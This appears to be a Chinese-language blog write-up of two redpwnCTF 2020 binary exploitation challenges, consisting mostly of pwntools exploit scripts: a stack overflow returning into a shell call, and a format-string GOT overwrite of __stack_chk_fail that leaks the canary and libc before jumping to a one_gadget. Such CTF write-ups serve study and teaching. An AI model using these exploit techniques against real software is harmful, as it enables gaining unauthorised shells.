redpwnctf 2020 pwn


阅读数: 次   
字数统计: 372字   |   阅读时长: 2分

coffer-overflow-0
dead-canary

@TOC

coffer-overflow-0

第三道直接溢出返回到system(“/bin/sh”)就行了
前两道都是覆盖一个变量,或者和第三道一样,直接返回也可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python2
# coding=utf-8
from pwn import *

arch = "amd64"
filename = "coffer-overflow-0"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)


# libc


def b(addr):
    bk = "b *" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    payload=b'a'*(0x28)+p64(0x00000000004006EE)
    io.sendline(payload)
    io.interactive()
main()

dead-canary

故意触发canary并且利用格式化字符串漏洞修改chk_fail函数ret2main,泄露canary和libc,再溢出到onegadget即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python2
# coding=utf-8
from pwn import *
arch = "amd64"
filename = "dead-canary"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
main_addr=0x0000000000400737
__stack_chk_fail=elf.got['__stack_chk_fail']
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    io.recvuntil("What is your name: ")
    gdb.attach(io,b'b read')
    #####leak_libc_ret_main#####
    payload=b'%39$p%3$p%1815x%9$hnaaaa'
    payload+=p64(__stack_chk_fail)
    payload=payload.ljust(0x118, b'a')
    io.sendline(payload)
    io.recvuntil("Hello ")
    canary=int(io.recv(18),16)
    write_addr=int(io.recv(14),16)-0x10
    io.recv()
    print("canary:", hex(canary))
    print("write_addr:",hex(write_addr))
    #####count#####
    libcbase=write_addr-libc.symbols['write']
    ogg_addr=libcbase+ogg_libc[0]
    #####getshell######
    payload=b'a'*(0x110-0x8)+p64(canary)+b'b'*8+p64(ogg_addr)
    io.sendline(payload)
    io.recv()
    io.interactive()
main()


-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791